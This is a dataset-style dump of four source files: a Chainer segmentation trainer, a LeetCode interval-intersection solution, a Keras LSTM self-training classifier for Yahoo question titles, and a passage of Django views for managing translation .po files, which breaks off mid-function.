blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed9cdd0e4b2fcfc6edd795da9fa5d9edc907068a
|
ceea480538d17dede8973656d69df028f6e113c5
|
/trainer.py
|
297c3f48e1cac94e6c419ba7fea5be96f577ceab
|
[] |
no_license
|
yuki1125/semantic_seg
|
990287492317f193d5bc3619f23db9b290dc74e3
|
b034bdeb51a2b3ad365d3bf5b7c5604fed7a9d50
|
refs/heads/master
| 2020-04-13T03:40:05.798578
| 2018-12-24T01:53:52
| 2018-12-24T01:53:52
| 162,938,261
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,962
|
py
|
import argparse
import os
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import iterators
from chainer import training
from chainer import optimizers
from chainer.training import extensions
from model import FCN
from model_2 import FCNN
from dataset import LabeledImageDataset
from mIOU import PixelwiseSigmoidClassifier
from unet import UNet
BASE_ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)))
TEST_PATH = os.path.join(BASE_ROOT, 'data\\seg_test_images\\seg_test_images')
TRAIN_ANNO_PATH = os.path.join(BASE_ROOT, 'data\\seg_train_annotations\\seg_train_annotations')
TRAIN_PATH = os.path.join(BASE_ROOT, 'data\\seg_train_images\\seg_train_images')
def create_trainer():
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', default=BASE_ROOT,
help='Path to directory containing train.txt, val.txt')
parser.add_argument('--images', default=TRAIN_PATH,
help='Root directory of input images')
parser.add_argument('--labels', default=TRAIN_ANNO_PATH,
help='Root directory of label images')
parser.add_argument('--batchsize', '-b', type=int, default=4,
help='Number of images in each mini-batch')
parser.add_argument('--test-batchsize', '-B', type=int, default=4,
help='Number of images in each test mini-batch')
parser.add_argument('--epoch', '-e', type=int, default=50,
help='Number of sweeps oever the dataset to train')
parser.add_argument('--gpu', '-g', type=int, default=0,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--frequency', '-f', type=int, default=1,
help='Frequency of taking a snapshot')
parser.add_argument('--out', '-o', default='logs',
help='Directory to output the result under models directory')
parser.add_argument('--resume', '-r', default='',
help='Resume the training from snapshot')
parser.add_argument('--noplot', dest='plot', action='store_false',
help='Disable PlotReport extention')
parser.add_argument('--tcrop', type=int, default=256,
help='Crop size for train-set images')
parser.add_argument('--vcrop', type=int, default=256,
help='Crop size for validation-set images')
args = parser.parse_args()
assert (args.tcrop % 16 == 0) and (args.vcrop % 16 == 0), "tcrop and vcrop must be divisible by 16."
print('GPU: {}'.format(args.gpu))
print('# Minibatch-size: {}'.format(args.batchsize))
print('# Crop-size: {}'.format(args.tcrop))
print('# epoch: {}'.format(args.epoch))
print('')
# model.pyで定義したモデルを使用
model = FCNN(out_h=256, out_w=256)
# ピクセルごとに多値分類なので、ロス関数にsoftmax cross entroypを
# 精度を測る関数としてmean_squared_errorを使用する
train_model = PixelwiseSigmoidClassifier(model)
# 最適化
optimizer = optimizers.Adam()
optimizer.setup(train_model)
# Load data
train = LabeledImageDataset(os.path.join(args.dataset, "train.txt"), args.images, args.labels,
mean=0, crop_size=args.tcrop, test=True, distort=False)
val = LabeledImageDataset(os.path.join(args.dataset, "val.txt"), args.images, args.labels,
mean=0, crop_size=args.tcrop, test=True, distort=False)
# イテレータ
train_iter = iterators.SerialIterator(train, args.batchsize)
val_iter = iterators.SerialIterator(val, args.batchsize, repeat=False, shuffle=False)
# イテレータからのデータ引き出し、モデルへの受け渡し、損失計算、パラーメタ更新を
# updaterによって行う
updater = training.StandardUpdater(train_iter, optimizer, device=args.gpu)
# Extensionとupdaterをtaraienrに入れる
trainer = training.trainer.Trainer(updater, (args.epoch, 'epoch'))
logging_attributes = [
'epoch', 'main/loss', 'main/accuracy', 'val/main/loss', 'val/main/accuracy']
trainer.extend(extensions.LogReport(logging_attributes))
trainer.extend(extensions.snapshot(filename='snapshot_epoch-{.updater.epoch}'))
trainer.extend(extensions.PrintReport(logging_attributes))
trainer.extend(extensions.PlotReport(['main/loss', 'val/main/loss']))
trainer.extend(extensions.PlotReport(['main/accuracy', 'val/main/accuracy'], 'epoch', file_name='accuracy.png'))
trainer.extend(extensions.Evaluator(val_iter, optimizer.target, device=args.gpu), name='val')
return trainer
trainer = create_trainer()
trainer.run()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8e789d064478ca11b9395388fe2afcf549fdeb58
|
d70e3c5a374e4a644ac959afd1d5bccfb7959580
|
/May Leetcode Challenge/23_Interval_list_Intersection.py
|
66ef34cb508227e31756b38335ddd783e9e3efa5
|
[] |
no_license
|
vidhlakh/LeetcodeProjects
|
17bbc9f1ad927478a3acdbc1bd1c78488ba62ad1
|
d6bdfa55832980aa80bda818ae657df74aa3cd3b
|
refs/heads/master
| 2022-09-20T11:15:39.539572
| 2020-06-01T01:13:24
| 2020-06-01T01:13:24
| 262,650,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
class Solution:
def intervalIntersection(self, A, B):
i,j=0,0
intervals =[]
while (i< len(A) and j < len(B) ):
#Starting point is maximum of both the points, Ending is minimum of both the points
interval_starting, interval_ending = max(A[i][0], B[j][0]), min(A[i][1],B[j][1])
if interval_starting <= interval_ending:
intervals.append([interval_starting,interval_ending])
if A[i][1] < B[j][1]:
i +=1 # if A's ending element is lesser, increemnts A's ending to next staritng eleemnt
else:
j +=1
return intervals
s = Solution()
print(s.intervalIntersection([[0,2],[5,10],[13,23],[24,25]],[[1,5],[8,12],[15,24],[25,26]]))
|
[
"vidhlakh@gmail.com"
] |
vidhlakh@gmail.com
|
dae74131879866f3ed080dc1e0c3311a09c4273a
|
06298b10b0b2860a94b7234cae30eeed422f21bc
|
/Snowball.py
|
5d790dfe5b3a3b9cc16e3d3697b3754f1652c1c0
|
[] |
no_license
|
vicmak/Sequence-classification
|
974d0848043362b4367ec7e374acceb31f8e0861
|
6b106a8689fd14284aa67c0674d39d01113dc405
|
refs/heads/master
| 2021-01-20T13:41:34.009623
| 2018-12-05T12:29:20
| 2018-12-05T12:29:20
| 90,512,819
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,203
|
py
|
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Activation
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from collections import Counter, defaultdict
from itertools import count
import nltk
import mmap
import itertools
from sklearn import model_selection
import copy
from sklearn.metrics import roc_auc_score
from sklearn.metrics import recall_score
from keras.layers import Dropout
q_ids = []
UNLABELED_INSTANCES_NUMBER = 1000
def is_common(common_list, word):
for pair in common_list:
if pair[0] == word:
return True
return False
class Vocab: # Storing the vocabulary and word-2-id mappings
def __init__(self, w2i=None):
if w2i is None: w2i = defaultdict(count(0).next)
self.w2i = dict(w2i)
self.i2w = {i: w for w, i in w2i.iteritems()}
@classmethod
def from_corpus(cls, corpus):
w2i = defaultdict(count(0).next)
for sent in corpus:
[w2i[word] for word in sent]
return Vocab(w2i)
def size(self): return len(self.w2i.keys())
vocab_filename = "C:\\corpora\\yahoo\\titles20M\\small_vocab.txt"
def read_vocab_from_list(filename):
w2i = dict()
counter = 0
with open(filename) as dict_file:
for line in dict_file:
word = line.strip()
w2i[word] = counter
counter += 1
return w2i
vocab_dictionary = read_vocab_from_list(vocab_filename)
main_vocab = Vocab(vocab_dictionary)
print "Vocab size", main_vocab.size()
def ExtractAlphanumeric(ins):
from string import ascii_letters, digits, whitespace, punctuation
return "".join([ch for ch in ins if ch in (ascii_letters + digits + whitespace + punctuation)])
def get_padded_sentences_tokens_list(text):
tokens = []
sentences = nltk.sent_tokenize(text)
for sent in sentences:
sent_tokens = nltk.word_tokenize(sent)
tokens += ["<sentence-start>"] + sent_tokens + ["<sentence-stop>"]
return tokens
def get_int_sentences(sentences, vocab):
int_sents = []
for sentence in sentences:
isent = [vocab.w2i[w] for w in sentence]
int_sents.append(isent)
return int_sents
class UnlabeledFastCorpusReader:
def __init__(self, fname):
self.fname = fname
def __iter__(self):
with open(self.fname) as unlabeled_file:
for i in range(0, UNLABELED_INSTANCES_NUMBER):
current_line = unlabeled_file.next()
line = current_line.strip()
tokens = line.split("\t")
line = tokens[8]
line = get_tokenized_padded_line(line)
yield line
def get_tokenized_padded_line(string_line, vocab):
line = string_line.lower()
line = ExtractAlphanumeric(line)
tokens = get_padded_sentences_tokens_list(line)
line = ["<start>"] + tokens + ["<stop>"]
clean_line = []
for token in line:
if token in vocab.w2i.keys():
clean_line.append(token)
return clean_line
class CompleteCorpusReader:
def __init__(self, fname):
self.fname = fname
self.f = open(fname, 'rb')
def __iter__(self):
# in Linux\Mac replace with m = mmap.mmap(self.f.fileno(), 0, prot=mmap.PROT_READ)
m = mmap.mmap(self.f.fileno(), 0, access=mmap.ACCESS_READ)
data = m.readline()
while data:
parts = data.split(",") # get the title of the question
data = m.readline()
end = len(parts)-1
text_parts = parts[1: end] # Extract all title words, except for the classification value
line = ",".join(text_parts)
line = get_tokenized_padded_line(line, main_vocab)
# Yield a list of tokens for this question
yield line
unlabeled_titles_filename = "C:\\corpora\\yahoo\\titles20M\\question.tsv"
with open(unlabeled_titles_filename) as unlabeled_file:
for i in range(0, UNLABELED_INSTANCES_NUMBER):
current_line = unlabeled_file.next()
line = current_line.strip()
tokens = line.split("\t")
line = tokens[8]
line = get_tokenized_padded_line(line, main_vocab)
yield line
class FastCorpusReaderYahoo:
def __init__(self, fname):
self.fname = fname
self.f = open(fname, 'rb')
def __iter__(self):
#in Linux\Mac replace with m = mmap.mmap(self.f.fileno(), 0, prot=mmap.PROT_READ)
m = mmap.mmap(self.f.fileno(), 0, access=mmap.ACCESS_READ)
data = m.readline()
description_file = "C:\\corpora\\yahoo\\descr.tsv"
answers_file = "C:\\corpora\\yahoo\\answers.csv"
best_answer_file = "C:\\corpora\\yahoo\\best_answers.csv"
while data:
parts = data.split(",") #get the title of the question
qid = parts[0] # Extract the question-ID
q_ids.append(qid) # Add the question-ID to list of all extracted Question-IDs
# Read the description into string (TAB separated)
description = "" # Init the description string
answer = ""
'''
with file(description_file) as f:
for l in f:
description_parts = l.split("\t")
if qid == description_parts[0]:
description += description_parts[1]
#print "added:", description
#Read the answers into string (COMMA separated)
with file(best_answer_file) as af:
for l in af:
answer_parts = l.split(",")
if qid == answer_parts[0]:
answer += ",".join(answer_parts[1:])
'''
end = len(parts)-1
text_parts = parts[1 : end] # Extract all title words, except for the classification value
line = ",".join(text_parts)
data = m.readline()
line = line.lower() + description.lower() + answer.lower()
line = get_tokenized_padded_line(line, main_vocab)
# Yield a list of tokens for this question
yield line
def read_next_lines(filename, from_line_number, to_line_number):
lines = []
with open(filename) as unlabeled_file:
for line in itertools.islice(unlabeled_file, from_line_number, to_line_number):
parts = line.split("\t")
title = parts[8]
title = title.lower()
tokenized_title = get_tokenized_padded_line(title, main_vocab)
lines.append(tokenized_title)
return lines
def readY(fname):
Ys = []
with file(fname) as fh:
for line in fh:
line = line.lower()
Ys.append(int(line.strip()[-1]))
return Ys
def read_embeddings(embeddings_filename):
embeddings = dict()
with file(embeddings_filename) as f:
for line in f:
tokens = line.split(" ")
word = tokens[0].strip()
emb = tokens[1:]
float_emb = [float(x) for x in emb]
embeddings[word] = float_emb
return embeddings
def read_word2vec_embeddings(embeddings_filename):
embeddings = dict()
counter = 0
with file(embeddings_filename) as f:
for line in f:
if counter > 0:
tokens = line.split(" ")
word = tokens[0]
emb = tokens[1:]
float_emb = [float(x) for x in emb]
embeddings[word] = float_emb
counter += 1
return embeddings
labeled_title_filename = "C:\\corpora\\yahoo\\TitleUnescaped.csv"
unlabeled_titles_filename = "C:\\corpora\\yahoo\\titles20M\\question.tsv"
print "Read labeled file..."
labeled_train = FastCorpusReaderYahoo(labeled_title_filename)
embeddings_filename = "C:\\corpora\\embeddings\\titles300d.txt"
print "reading word2vec embeddings"
embs = read_word2vec_embeddings(embeddings_filename)
print "Checking embeddings for THE", embs["the"]
embedding_vector_length = 300
print "computing embeddings"
embedding_weights = np.zeros((main_vocab.size(), embedding_vector_length))
for word, index in main_vocab.w2i.items():
if word in embs.keys():
embedding_weights[index, :] = embs[word]
else:
sampl = np.random.uniform(low=-1.0, high=1.0, size=(embedding_vector_length,))
embs[word] = sampl
embedding_weights[index, :] = sampl
print "embedding sample", embedding_weights[0]
print "another embedding sample", embedding_weights[1]
print "Reading Ys"
Ys = readY(labeled_title_filename)
labeled_train = list(labeled_train)
print "Creating labeled i-sentences for training"
int_train = get_int_sentences(labeled_train, main_vocab)
unlabeled_batch_size = 1000
max_sent_length = 30
new_instances = []
new_Ys = []
original_instances = copy.deepcopy(int_train)
original_Ys = copy.deepcopy(Ys)
def get_ensemble_data(text_probs):
classes = []
instances = []
ensemble_filename = "C:\\corpora\\yahoo\\Ensemble_Data_baseline.csv"
for_asert = 0
qid_counter = dict()
with file(ensemble_filename) as f:
for line in f:
tokens = line.strip().split(",")
qid = tokens[0]
for [id, text_prob] in text_probs:
if qid == id:
if qid in qid_counter.keys():
qid_counter[qid] += 1
else:
qid_counter[qid] = 1
instance =[]
instance.append(float(tokens[1]))
instance.append(text_prob[0])
instance.append(float(tokens[3]))
instances.append(instance)
classes.append(int(tokens[4]))
for_asert +=1
return instances, classes
for i in range(0, 5):
unlabeled_train = read_next_lines(unlabeled_titles_filename, i*unlabeled_batch_size, i*unlabeled_batch_size + unlabeled_batch_size)
print "Creating unlabeled i-sentences for training, batch:", i
int_unlabeled_train = get_int_sentences(unlabeled_train, main_vocab)
print " Building the model....."
# start label propagation
model = Sequential()
model.add(Embedding(main_vocab.size(), embedding_vector_length, input_length=max_sent_length, weights=[embedding_weights]))
model.add(LSTM(200, recurrent_dropout=0.3))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print "Padding the model"
padded_train = sequence.pad_sequences(int_train, max_sent_length)
print "fitting the model"
model.fit(padded_train, Ys, epochs=4, batch_size=100)
print "Padding test"
padded_test = sequence.pad_sequences(int_unlabeled_train, max_sent_length)
print "Predicting..."
predictions = model.predict(padded_test)
# Here add the best predictions to the labeled instances
new_instances_num = 0
for i in range(0, len(predictions)):
if predictions[i] > 0.9:
int_train.append(int_unlabeled_train[i])
new_instances.append(int_unlabeled_train[i])
Ys.append(1)
new_Ys.append(1)
new_instances_num += 1
if predictions[i] < 0.1:
int_train.append(int_unlabeled_train[i])
new_instances.append(int_unlabeled_train[i])
Ys.append(0)
new_Ys.append(0)
new_instances_num += 1
print "Added new instances:", new_instances_num
print "STARTING K-FOLD, TEST"
recall_1_list = []
recall_0_list = []
auc = []
accumulator_probs = []
kf = model_selection.KFold(n_splits=2)
for train_idx, test_idx in kf.split(original_instances):
X_train = [original_instances[i] for i in train_idx]
Y_train = [original_Ys[i] for i in train_idx]
X_train = X_train + new_instances
Y_train = Y_train + new_Ys
X_test = [int_train[i] for i in test_idx]
Y_test = [Ys[i] for i in test_idx]
q_ids_test = [q_ids[i] for i in test_idx]
X_train = sequence.pad_sequences(X_train, maxlen=max_sent_length)
X_test = sequence.pad_sequences(X_test, maxlen=max_sent_length)
model = Sequential()
model.add(Embedding(main_vocab.size(), embedding_vector_length, input_length=max_sent_length, weights=[embedding_weights]))
model.add(LSTM(200, recurrent_dropout=0.3))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X_train, Y_train, epochs=4, batch_size=100)
predictions = model.predict(X_test)
for i in range(0, len(q_ids_test)):
accumulator_probs.append([q_ids_test[i], predictions[i]])
auc.append(roc_auc_score(Y_test, predictions))
rounded = []
for pred in predictions:
if pred > 0.5:
rounded.append(1)
else:
rounded.append(0)
recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
print "FINISHED FOLD - TRAIN TEXT"
print "STARTING ENSEMBLE"
instances, classes = get_ensemble_data(accumulator_probs)
ensemble_recall_1_list = []
ensemble_recall_0_list = []
ensemble_auc = []
kf = model_selection.KFold(n_splits=2)
for train_idx, test_idx in kf.split(instances):
print "ENSEMBLE FOLD"
X_train = np.array([instances[i] for i in train_idx])
Y_train = np.array([classes[i] for i in train_idx])
X_test = [instances[i] for i in test_idx]
Y_test = [classes[i] for i in test_idx]
ensemble_model = Sequential()
ensemble_model.add(Dense(units=3, activation="sigmoid", input_shape=(3,)))
ensemble_model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))
ensemble_model.compile(loss="binary_crossentropy", optimizer="adam")
ensemble_model.fit(X_train, Y_train, epochs=3)
print"FITTED"
predictions = ensemble_model.predict(X_test)
# print predictions
ensemble_auc.append(roc_auc_score(Y_test, predictions))
rounded = []
for pred in predictions:
if pred > 0.5:
rounded.append(1)
else:
rounded.append(0)
ensemble_recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
ensemble_recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
print "TEXT:"
print "RECALL 0:", sum(recall_0_list) / float(len(recall_0_list))
print "RECALL 1:", sum(recall_1_list) / float(len(recall_1_list))
print "AUC :", sum(auc) / float(len(auc))
print "ENSEMBLE"
print "RECALL 0:", sum(ensemble_recall_0_list) / float(len(ensemble_recall_0_list))
print "RECALL 1:", sum(ensemble_recall_1_list) / float(len(ensemble_recall_1_list))
print "AUC :", sum(ensemble_auc) / float(len(ensemble_auc))
'''
print len(int_train)
print len(Ys)
recall_1_list = []
recall_0_list = []
auc = []
accumulator_probs=[]
# fix random seed for reproducibility
np.random.seed(7)
kf = model_selection.KFold(n_splits=5)
for train_idx, test_idx in kf.split(int_train):
X_train = [int_train[i] for i in train_idx]
Y_train = [Ys[i] for i in train_idx]
X_test = [int_train[i] for i in test_idx]
Y_test = [Ys[i] for i in test_idx]
q_ids_test = [q_ids[i] for i in test_idx]
X_train = sequence.pad_sequences(X_train, maxlen=max_sent_length)
X_test = sequence.pad_sequences(X_test, maxlen=max_sent_length)
# create the model
model = Sequential()
model.add(Embedding(WORDS_NUM, embedding_vector_length, input_length=max_sent_length, weights=[embedding_weights]))
#model.add(Dropout(0.1))
model.add(LSTM(200, recurrent_dropout=0.3))
#model.add(Dropout(0.2))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print "Fitting the model"
model.fit(X_train, Y_train, epochs=4, batch_size=100)
predictions = model.predict(X_test)
for i in range(0,len(q_ids_test)):
accumulator_probs.append([q_ids_test[i], predictions[i]])
auc.append(roc_auc_score(Y_test, predictions))
rounded = []
for pred in predictions:
if pred >0.5:
rounded.append(1)
else:
rounded.append(0)
recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
print "FINISHED FOLD - TRAIN TEXT"
def get_ensemble_data(text_probs):
classes = []
instances = []
ensemble_filename = "C:\\corpora\\yahoo\\Ensemble_Data_baseline.csv"
#print "LENGTH text probs", len(text_probs)
for_asert = 0
qid_counter = dict()
with file(ensemble_filename) as f:
for line in f:
tokens = line.strip().split(",")
qid = tokens[0]
for [id, text_prob] in text_probs:
if qid == id:
if qid in qid_counter.keys():
qid_counter[qid] += 1
else:
qid_counter[qid] = 1
instance =[]
instance.append(float(tokens[1]))
instance.append(text_prob[0])
instance.append(float(tokens[3]))
instances.append(instance)
classes.append(int(tokens[4]))
for_asert +=1
return instances, classes
print "STARTING ENSEMBLE"
instances, classes = get_ensemble_data(accumulator_probs)
ensemble_recall_1_list = []
ensemble_recall_0_list = []
ensemble_auc = []
kf = model_selection.KFold(n_splits=5)
for train_idx, test_idx in kf.split(instances):
print "ENSEMBLE FOLD"
X_train = np.array([instances[i] for i in train_idx])
Y_train = np.array([classes[i] for i in train_idx])
X_test = [instances[i] for i in test_idx]
Y_test = [classes[i] for i in test_idx]
ensemble_model = Sequential()
ensemble_model.add(Dense(units=3, activation="sigmoid", input_shape=(3,)))
ensemble_model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))
ensemble_model.compile(loss="binary_crossentropy", optimizer="adam")
ensemble_model.fit(X_train, Y_train, epochs=300)
print"FITTED"
predictions = ensemble_model.predict(X_test)
#print predictions
ensemble_auc.append(roc_auc_score(Y_test, predictions))
rounded = []
for pred in predictions:
if pred >0.5:
rounded.append(1)
else:
rounded.append(0)
ensemble_recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
ensemble_recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
print "TEXT:"
print "RECALL 0:", sum(recall_0_list) / float(len(recall_0_list))
print "RECALL 1:", sum(recall_1_list) / float(len(recall_1_list))
print "AUC :", sum(auc)/float(len(auc))
print "ENSEMBLE"
print "RECALL 0:", sum(ensemble_recall_0_list) / float(len(ensemble_recall_0_list))
print "RECALL 1:", sum(ensemble_recall_1_list) / float(len(ensemble_recall_1_list))
print "AUC :", sum(ensemble_auc)/float(len(ensemble_auc))
'''
|
[
"noreply@github.com"
] |
noreply@github.com
|
9ebffdc2c7a97a1fcd82205153e8ae6ff5acd96a
|
4dbdcdd777897567ede8343299b5dacf59580479
|
/translations/views.py
|
9cffdce4a4af841a082619776557b448ebeada5a
|
[
"BSD-3-Clause"
] |
permissive
|
OpenTTD-Ladder/yawd-translations
|
88cae158d561034ca6e69311fb8be9acc2b73627
|
913025f4361883408ca480a8e7c9ea90add0a9db
|
refs/heads/master
| 2021-01-15T20:12:59.548959
| 2013-07-19T09:06:07
| 2013-07-19T09:06:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,508
|
py
|
import os, shutil
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.management.commands.compilemessages import has_bom
from django.core.management.commands.makemessages import make_messages, handle_extensions
from django.http import Http404
from django.http import HttpResponseRedirect
from django.utils.encoding import smart_str
from django.utils.importlib import import_module
from django.utils.text import capfirst
from django.utils.translation import to_locale, ugettext as _
from django.views.generic import TemplateView, FormView
from forms import PoFileForm
from models import Language
from utils import compile_message_file, concat_message_files, reset_translations
class GenerateTranslationMessagesView(TemplateView):
template_name ='admin/includes/translation_messages_list.html'
def get(self, request, *args, **kwargs):
if not request.is_ajax():
raise Http404
if not request.user.has_perm('translations.edit_translations'):
raise PermissionDenied
try:
self.language = Language.objects.get(name=args[0])
self.locale = to_locale(self.language.name)
except Language.DoesNotExist:
raise Http404
if settings.LOCALE_PATHS:
#check if the folder for this language exists and attempt to create it if id does not exist
self.po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
if not os.path.exists(self.po_path):
try:
os.makedirs(self.po_path)
except:
self.error = _('Could not create the target folder.')
else:
self.error = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')
#delete files if requested
if request.GET.get('delete', 0):
for f in os.listdir(self.po_path):
if f.endswith('.po') or f.endswith('.mo'):
os.unlink(os.path.join(self.po_path, f))
context = self.get_context_data(**kwargs)
return self.render_to_response(context)
def get_context_data(self, **kwargs):
context = super(GenerateTranslationMessagesView, self).get_context_data(**kwargs)
if hasattr(self, 'error') and self.error:
context['error'] = self.error
return context
#locate the current directory
curr_dir = os.curdir
domain_dict = {'django' : ['html','txt'], 'djangojs' : ['js']}
lang_files = []
#iterate over the installed applications and copy their po files
#for this language to the appropriate folder
for app_name in settings.INSTALLED_APPS:
mod = import_module(app_name)
mod_root = os.path.dirname(mod.__file__)
if not os.path.exists(os.path.join(mod_root, 'locale')):
continue
original_path = os.path.join(mod_root, 'locale', to_locale(self.language.name), 'LC_MESSAGES')
delete_at_the_end = False
if not os.path.exists(original_path):
if not app_name.startswith('django.contrib'):
try: #try to create language directory for the app
os.makedirs(original_path)
delete_at_the_end = True
except:
continue
else:
continue
if not app_name.startswith('django.contrib'):
#move original files to a temp file
for file_ in list(os.listdir(original_path)):
if file_.endswith('.po'):
shutil.copy(os.path.join(original_path, file_), os.path.join(original_path, 'original-%s' % file_))
#copy the project-wise files to the appropriate directory
if not self.request.GET.get('delete', 0):
#replace original file with the yawd version
#so that it gets updated
for f in list(os.listdir(self.po_path)):
if f.startswith('%s-' % app_name) and f.endswith('.po'):
shutil.copy(os.path.join(self.po_path, f), os.path.join(original_path, f.replace('%s-' % app_name, '')))
#makemessages excluding the core applications
os.chdir(mod_root)
for key, value in domain_dict.items():
make_messages(locale=self.locale, domain=key, extensions=handle_extensions(value), verbosity=0)
os.chdir(curr_dir)
#iterate over the application po files
for file_ in list(os.listdir(original_path)):
if not file_.startswith('original-') and file_.endswith('.po'):
original_file_path = os.path.join(original_path, file_)
file_name = '%s-%s' % (app_name, file_)
#copy file
copy_path = os.path.join(self.po_path, file_name)
if self.request.GET.get('delete', 0) or not (app_name.startswith('django.contrib') and os.path.exists(copy_path)):
shutil.copy(original_file_path, copy_path)
os.chmod(copy_path, 0664)
#unlink updated file
if not app_name.startswith('django.contrib'):
os.unlink(original_file_path)
lang_files.append(file_name)
if not app_name.startswith('django.contrib'):
if delete_at_the_end:
shutil.rmtree(os.path.join(mod_root, 'locale', to_locale(self.language.name)))
else:
for file_ in os.listdir(original_path):
#put back the original application files
if file_.startswith('original-') and file_.endswith('.po'):
shutil.move(os.path.join(original_path, file_), os.path.join(original_path, file_.replace('original-','')))
#concat all messages in a single .po file for each domain
for domain in domain_dict:
file_name = '%s.po' % domain
uni_django_path = os.path.join(self.po_path, file_name)
if os.path.exists(uni_django_path):
os.unlink(uni_django_path)
source_files = [os.path.join(self.po_path, f) for f in lang_files if f.endswith(file_name)]
if source_files:
#merge .po files
concat_message_files(source_files, uni_django_path)
#compile django.po
if not has_bom(uni_django_path):
compile_message_file(uni_django_path)
#reset the cached translation messages so that
#we do not need to restart the web server
reset_translations(self.language.name)
context['lang_files'] = sorted(lang_files)
return context
class TranslationMessagesView(TemplateView):
template_name = 'admin/translation_messages.html'
def get(self, request, *args, **kwargs):
if not request.user.has_perm('translations.view_translations'):
raise PermissionDenied
try:
self.language = Language.objects.get(name=args[0])
self.locale = to_locale(self.language.name)
except Language.DoesNotExist:
raise Http404
context = self.get_context_data(**kwargs)
return self.render_to_response(context)
def get_context_data(self, **kwargs):
context = super(TranslationMessagesView, self).get_context_data(**kwargs)
opts = self.language._meta
context['title'] = _('Translate Static Messages')
context['language'] = self.language
context['opts'] = opts
#add permission context variables
context['has_change_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
context['has_change_object_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission(), self.language.pk)
if not settings.LOCALE_PATHS:
context['error'] = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')
return context
context['lang_files'] = []
po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
if os.path.exists(po_path):
for file_ in os.listdir(po_path):
if file_.endswith('.po') and not file_ in ['django.po', 'djangojs.po']:
context['lang_files'].append(file_)
context['lang_files'].sort()
if not os.path.exists(po_path) or not context['lang_files']:
context['warning'] = _('The system does not appear to have any translation messages for this language. Please use the "Generate messages" button.')
return context
class TranslationMessagesEditView(FormView):
template_name = 'admin/edit_translation_messages.html'
form_class = PoFileForm
success_url = '../'
def dispatch(self, request, *args, **kwargs):
"""
Overridden dispatch method to check if user has the right to edit
the .po file.
"""
if not request.user.has_perm('translations.edit_translations'):
raise PermissionDenied
return super(TranslationMessagesEditView, self).dispatch(request, *args, **kwargs)
def get_initial(self):
"""
Attempt to load the .po file and put its contents in the form's
initial data
"""
try:
self.language = Language.objects.get(name=self.args[0])
except Language.DoesNotExist:
raise Http404
if settings.LOCALE_PATHS:
#check if the folder for this language exists and attempt to create it if id does not exist
self.po_path = os.path.join(settings.LOCALE_PATHS[0], to_locale(self.language.name), 'LC_MESSAGES')
else:
raise Http404
self.po_file = self.args[1]
try:
file_ = open(os.path.join(self.po_path, self.po_file), 'r')
contents = file_.read()
file_.close()
return { 'po_content' : contents }
except:
raise Http404
def get_context_data(self, **kwargs):
context = super(TranslationMessagesEditView, self).get_context_data(**kwargs)
opts = self.language._meta
context['title'] = u'%s %s' % (_('Edit'), self.po_file)
context['language'] = self.language
context['opts'] = opts
#add permission context variables
context['has_delete_permission'] = False
context['has_add_permission'] = False
context['has_change_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
context['has_change_object_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission(), self.language.pk)
context['change'] = True
context['is_popup'] = False
context['save_as'] = False
return context
def form_valid(self, form):
try:
file_path = os.path.join(self.po_path, self.po_file)
file_ = open(file_path, 'w+')
file_.write(smart_str(form.cleaned_data['po_content']))
file_.close()
domain = 'django.po' if self.po_file.endswith('django.po') else 'djangojs.po'
uni_django_path = os.path.join(self.po_path, domain)
source_files = []
